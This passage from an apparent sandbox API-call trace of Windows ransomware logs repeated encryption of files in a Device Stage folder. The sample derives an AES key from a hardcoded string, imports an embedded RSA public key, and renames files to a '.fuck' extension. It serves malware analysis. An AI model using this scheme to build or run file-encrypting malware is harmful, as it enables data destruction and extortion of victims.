KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.673] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.673] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5008) returned 1 [0239.674] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5008, dwCertEncodingType=0x1, pInfo=0x28c8ca8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8cd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8ce0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bef18) returned 1 [0239.674] CryptEncrypt (in: hKey=0x28bef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.674] CryptEncrypt (in: hKey=0x28bef18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d55e0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d55e0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.674] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d55e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.674] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28d7a98, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.674] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d7a98*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.674] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7a98, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.674] CloseHandle (hObject=0xffffffff) returned 1 [0239.674] CloseHandle (hObject=0xffffffff) returned 1 [0239.674] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), bFailIfExists=0) returned 0 [0239.674] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x0) returned 0 [0239.675] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg")) returned 0 [0239.675] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.fuck")) returned 0 [0239.676] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.676] CryptDestroyKey (hKey=0x28bee98) returned 1 [0239.676] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.676] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.676] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.676] GetLastError () returned 0x5 [0239.676] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico")) returned 0x20 [0239.676] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x80) returned 0 [0239.677] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.677] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.677] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.677] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5778) returned 1 [0239.680] CryptCreateHash (in: hProv=0x28d5778, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.680] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.680] CryptHashData (hHash=0x28bee98, pbData=0x28895b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.680] CryptDeriveKey (in: hProv=0x28d5778, Algid=0x6610, hBaseData=0x28bee98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf018) returned 1 [0239.680] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.680] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.680] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d51a0) returned 1 [0239.680] CryptImportPublicKeyInfo (in: hCryptProv=0x28d51a0, dwCertEncodingType=0x1, pInfo=0x28c9668*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9698*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c96a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bf118) returned 1 [0239.680] CryptEncrypt (in: hKey=0x28bf118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.681] CryptEncrypt (in: hKey=0x28bf118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5338*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5338*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.681] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5338, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.681] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.681] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.681] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.681] CloseHandle (hObject=0xffffffff) returned 1 [0239.681] CloseHandle (hObject=0xffffffff) returned 1 [0239.681] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), bFailIfExists=0) returned 0 [0239.681] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x0) returned 0 [0239.682] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg")) returned 0 [0239.682] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.fuck")) returned 0 [0239.686] CryptDestroyHash (hHash=0x28bee98) returned 1 [0239.686] CryptDestroyKey (hKey=0x28bf018) returned 1 [0239.686] CryptReleaseContext (hProv=0x28d5778, dwFlags=0x0) returned 1 [0239.686] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.686] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.686] GetLastError () returned 0x5 [0239.686] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico")) returned 0x20 [0239.686] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x80) returned 0 [0239.687] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.687] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.687] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.688] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4cd8) returned 1 [0239.689] CryptCreateHash (in: hProv=0x28d4cd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.689] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.689] CryptHashData (hHash=0x28bee98, pbData=0x28892e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.690] CryptDeriveKey (in: hProv=0x28d4cd8, Algid=0x6610, hBaseData=0x28bee98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf018) returned 1 [0239.690] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.690] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.690] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d5090) returned 1 [0239.690] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5090, dwCertEncodingType=0x1, pInfo=0x28c8e48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8e78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8e80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bea98) returned 1 [0239.690] CryptEncrypt (in: hKey=0x28bea98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.690] CryptEncrypt (in: hKey=0x28bea98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5778*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5778*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.690] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5778, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.690] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.691] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.691] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.691] CloseHandle (hObject=0xffffffff) returned 1 [0239.691] CloseHandle (hObject=0xffffffff) returned 1 [0239.691] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), bFailIfExists=0) returned 0 [0239.691] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x0) returned 0 [0239.691] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg")) returned 0 [0239.692] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.fuck")) returned 0 [0239.692] CryptDestroyHash (hHash=0x28bee98) returned 1 [0239.692] CryptDestroyKey (hKey=0x28bf018) returned 1 [0239.692] CryptReleaseContext (hProv=0x28d4cd8, dwFlags=0x0) returned 1 [0239.692] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.692] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.692] GetLastError () returned 0x5 [0239.692] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico")) returned 0x20 [0239.693] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x80) returned 0 [0239.693] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.693] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.694] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg", dwFileAttributes=0x2) returned 0 [0239.694] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4cd8) returned 1 [0239.696] CryptCreateHash (in: hProv=0x28d4cd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.696] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.696] CryptHashData (hHash=0x28bf018, pbData=0x28894c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.696] CryptDeriveKey (in: hProv=0x28d4cd8, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bee98) returned 1 [0239.696] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.696] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.696] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d53c0) returned 1 [0239.696] CryptImportPublicKeyInfo (in: hCryptProv=0x28d53c0, dwCertEncodingType=0x1, pInfo=0x28ca298*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca2c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca2d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bf158) returned 1 [0239.696] CryptEncrypt (in: hKey=0x28bf158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.697] CryptEncrypt (in: hKey=0x28bf158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5228*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d5228*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5228, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.697] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.697] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.697] CloseHandle (hObject=0xffffffff) returned 1 [0239.697] CloseHandle (hObject=0xffffffff) returned 1 [0239.697] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device 